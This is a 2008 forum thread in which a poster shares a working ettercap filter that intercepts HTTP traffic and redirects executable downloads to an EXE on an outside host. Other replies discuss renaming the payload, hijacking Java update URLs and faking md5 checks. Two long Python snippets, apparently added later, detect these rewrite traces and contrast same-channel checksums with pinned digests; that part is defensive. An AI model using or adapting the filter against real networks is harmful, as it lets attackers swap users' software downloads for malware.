#1
08-06-2008, 10:39 AM
operat0r
Senior Member
Join Date: Nov 2006
Posts: 172

ettercap OWNAGED replace all exe's DL'ed

VIDEO:

http://blip.tv/file/1185726/

* works in Firefox great
* works in Opera, but only after about 10 seconds (this is reasonable)
* works in IE7

Code:
# replace rmccurdy with your website
# replace the url with what ever exe you like

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}

if (ip.proto == TCP && tcp.src == 80) {
   replace("keep-alive", "close");
   replace("Keep-Alive", "close");
}

if (ip.proto == TCP && search(DATA.data, ": application")) {
   # enable for logging: log(DECODED.data, "/tmp/log.log");
   msg("found EXE\n");
   # "Win32" is the first part of the exe example:
   # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
   if (search(DATA.data, "Win32")) {
      msg("doing nothing\n");
   } else {
      replace("200 OK", "301 Moved Permanently
Location: http://www.rmccurdy.com/scripts/quickclean.exe
");
      msg("redirect success\n");
   }
}


For an example of how to use etterfilter/ettercap and more goodies:
http://forums.remote-exploit.org/showthread.php?t=12885
__________________
Skiddie powers activate !

Last edited by operat0r; 08-28-2008 at 11:18 AM.
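For the monitoring side of the exchange in the post above, here is an added example of my own (it is not operat0r's filter and not ettercap code) that checks request/response pairs for the three traces this kind of in-path rewrite leaves on the wire: the same-length "Accept-Rubbish!" header standing in for Accept-Encoding, an executable request answered with a redirect to a different host, and bare LF line endings pasted into an otherwise CRLF response head. The sample messages, host names and the list of executable extensions are constructed for the example and are assumptions, not captured traffic.

```python
"""Flag HTTP exchanges that show the in-path rewrite pattern from the thread:
Accept-Encoding overwritten with 'Accept-Rubbish!' and an executable download
answered with a 301 to another host. Added example for defenders (run it over
a proxy log or pcap export); it is not ettercap code. Samples are constructed."""
import re
from urllib.parse import urlsplit

# Assumed: extensions treated as executable downloads.
EXE_EXT = (".exe", ".msi", ".dll", ".scr")
REDIRECTS = ("301", "302", "303", "307", "308")


def split_head(message: str):
    """Return (start_line, headers) for one HTTP message. Headers end at the
    first empty line, as a browser sees them; names are lower-cased."""
    head = []
    for line in re.split(r"\r?\n", message):
        if line == "":
            break
        head.append(line)
    headers = {}
    for line in head[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return (head[0] if head else ""), headers


def mixed_line_endings(message: str) -> bool:
    """True when the head mixes bare LF with CRLF, which is what pasting a
    multi-line string over the status line leaves behind."""
    head = message.split("\r\n\r\n", 1)[0]
    return "\r\n" in head and re.search(r"(?<!\r)\n", head) is not None


def analyze(request: str, response: str) -> list:
    """Return human-readable findings for one request/response pair."""
    findings = []
    req_line, req_h = split_head(request)
    resp_line, resp_h = split_head(response)
    req_parts, resp_parts = req_line.split(" "), resp_line.split(" ")
    target = req_parts[1] if len(req_parts) > 1 else ""
    status = resp_parts[1] if len(resp_parts) > 1 else ""
    host = req_h.get("host", "").lower()

    # 1. The filter writes same-length junk over Accept-Encoding so the
    #    server replies uncompressed; the junk name is the fingerprint.
    if "accept-rubbish!" in req_h:
        findings.append("request header 'Accept-Rubbish!' (Accept-Encoding overwritten)")
    # 2. An executable request answered with a redirect to another host.
    location = resp_h.get("location", "")
    if target.lower().endswith(EXE_EXT) and status in REDIRECTS and location:
        loc_host = (urlsplit(location).hostname or "").lower()
        if loc_host != host:
            findings.append(f"executable {target} redirected off-host to {location}")
    # 3. A status line rewritten in place with bare '\n' inside CRLF headers.
    if status in REDIRECTS and mixed_line_endings(response):
        findings.append("redirect response mixes bare LF and CRLF in its head")
    return findings


# --- constructed samples (not captured traffic) ---------------------------
CLEAN_REQUEST = (
    "GET /downloads/setup.exe HTTP/1.1\r\nHost: updates.example.com\r\n"
    "Accept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\n\r\n"
)
CLEAN_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
    "Content-Length: 4\r\nConnection: keep-alive\r\n\r\nMZ\x90\x00"
)
# The same exchange as a header-rewriting filter would leave it on the wire.
TAMPERED_REQUEST = CLEAN_REQUEST.replace("Accept-Encoding", "Accept-Rubbish!")
TAMPERED_RESPONSE = (
    "HTTP/1.1 301 Moved Permanently\nLocation: http://redirect-target.invalid/other.exe\n"
    "\r\nContent-Type: application/octet-stream\r\n"
    "Content-Length: 4\r\nConnection: close\r\n\r\nMZ\x90\x00"
)

if __name__ == "__main__":
    print("clean:   ", analyze(CLEAN_REQUEST, CLEAN_RESPONSE))
    print("tampered:", analyze(TAMPERED_REQUEST, TAMPERED_RESPONSE))
```

The third check is the one worth remembering: HTTP header lines end in CRLF, so a response head that mixes bare LF with CRLF is a strong sign that a string was pasted into it rather than generated by the server, independent of which redirect target or header name a given filter uses.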
#2
08-06-2008, 12:39 PM
ShadowKill
Senior Member
Join Date: Dec 2007
Location: /dev/null
Posts: 428

Quote:
Originally Posted by operat0r
I was listening to the podcast pauldotcom.com; they were talking about evilgrade.

What about ettercap/DNS spoof that would replace an update agent that is an HTTP GET to an EXE, or any executable for that matter?

Whatever app gets an EXE file over HTTP is replaced with a MS payload EXE.

Can this be done with, say, a simple 302 redirect for all EXE's maybe .. err
I don't really see why it couldn't be. The only issue I see is that you would need to perhaps write a script to rename your payload .EXE to that of the original. Otherwise, the user might catch it and either delete it and retry or start poking around for clues as to why they keep downloading the same file over and over again....
__________________
"There are only 10 kinds of people in this world, those who understand binary, and those who don't."
-Unknown

Compiz'd BT3 / Vista dual boot, nVidia 8800 GT, 3gb RAM, 500gb HDD, AMD 64 x2 5200+
#3
08-06-2008, 06:04 PM
ShadowKill
Senior Member
Join Date: Dec 2007
Location: /dev/null
Posts: 428

Quote:
Originally Posted by operat0r
Hmm, is it possible to have an ettercap filter pass a var to a shell script?

Think about all the apps that have updates that are not listed in evilgrade .. Adobe etc... Even add support for some kind of md5 MIM, so if it tries to get some md5 hash, just send it the hash for your MS payload...

Code:
java updates
http://java.sun.com/update/1.6.0/map-1.6.0.xml
http://javadl-esd.sun.com/update/1.6.0/map-1.6.0.xml
http://javadl-esd.sun.com/update/1.6.0/1.6.0_07-b06.xml
Maybe some kind of Apache mod_rewrite that does the renaming of the file for you.. if ettercap can't do regex etc ... ?
Sounds feasible to me, but there's only one way to know for sure right?
__________________
"There are only 10 kinds of people in this world, those who understand binary, and those who don't."
-Unknown

Compiz'd BT3 / Vista dual boot, nVidia 8800 GT, 3gb RAM, 500gb HDD, AMD 64 x2 5200+
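On the md5 idea in the quoted post: here is an added example of my own (not ettercap or evilgrade code, and not any vendor's updater) showing why a checksum that travels over the same unauthenticated HTTP path as the file gives an updater no protection when both can be rewritten together, while a digest the client already holds does catch the swap. The payload bytes, file names and digests are constructed stand-ins.

```python
"""Two updater integrity models under the threat discussed in the thread:
(A) trust a .md5 fetched next to the download over plain HTTP, versus
(B) compare against a digest the client already holds. Added example,
not ettercap or evilgrade code; payloads below are constructed stand-ins."""
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def verify_same_channel(blob: bytes, fetched_md5: str) -> bool:
    """Model A: the sidecar .md5 arrives over the same HTTP path as the file,
    so whoever can rewrite the file can rewrite the checksum to match it."""
    return hmac.compare_digest(md5_hex(blob), fetched_md5.strip().lower())


def verify_pinned(blob: bytes, pinned_sha256: str) -> bool:
    """Model B: the expected digest was shipped inside the client (or fetched
    over an independently authenticated channel), so it cannot be rewritten
    by an in-path party. Constant-time comparison avoids a timing side channel."""
    return hmac.compare_digest(sha256_hex(blob), pinned_sha256.strip().lower())


# --- constructed scenario (no real binaries involved) ---------------------
GENUINE = b"MZ\x90\x00genuine-updater-build"   # stand-in for the vendor's EXE
SWAPPED = b"MZ\x90\x00some-other-program"      # stand-in for a replaced EXE

# What the vendor publishes: the file plus a sidecar .md5, both over HTTP.
PUBLISHED = {"file": GENUINE, "md5": md5_hex(GENUINE)}
# What a client on a tampered path receives: file and .md5 replaced together.
TAMPERED = {"file": SWAPPED, "md5": md5_hex(SWAPPED)}
# What the client shipped with: the digest of the release it expects.
PINNED_SHA256 = sha256_hex(GENUINE)


def evaluate(received: dict) -> dict:
    """Run both checks on one download and report what each one concludes."""
    return {
        "same_channel_md5_ok": verify_same_channel(received["file"], received["md5"]),
        "pinned_sha256_ok": verify_pinned(received["file"], PINNED_SHA256),
    }


if __name__ == "__main__":
    for label, received in (("published", PUBLISHED), ("tampered", TAMPERED)):
        print(label, evaluate(received))
```

A pinned digest only works for a release the client already knows about; for an updater that must accept future releases, the thing to pin is the vendor's signing key, with each release carrying a signed manifest of digests, so that a rewritten file and a rewritten hash list both fail verification.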
#4
08-09-2008, 03:22 PM
ShadowKill
Senior Member
Join Date: Dec 2007
Location: /dev/null
Posts: 428

Quote:
Originally Posted by operat0r
Should I put exe\n or exe\r ??

Still can't get it working ..

As in, match exe and the new line or carriage return?

I would assume that it'd be \n, as \r is just a hard coded "Enter", correct? I'll fiddle around with it in a while and let you know the outcome.
__________________
"There are only 10 kinds of people in this world, those who understand binary, and those who don't."
-Unknown

Compiz'd BT3 / Vista dual boot, nVidia 8800 GT, 3gb RAM, 500gb HDD, AMD 64 x2 5200+
#5
08-19-2008, 11:36 AM
operat0r
Senior Member
Join Date: Nov 2006
Posts: 172

OK, so I got it working in IE7. Not sure if I need half the code in the filter, but it works, so have fun!
__________________
Skiddie powers activate !


Powered by vBulletin® Version 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.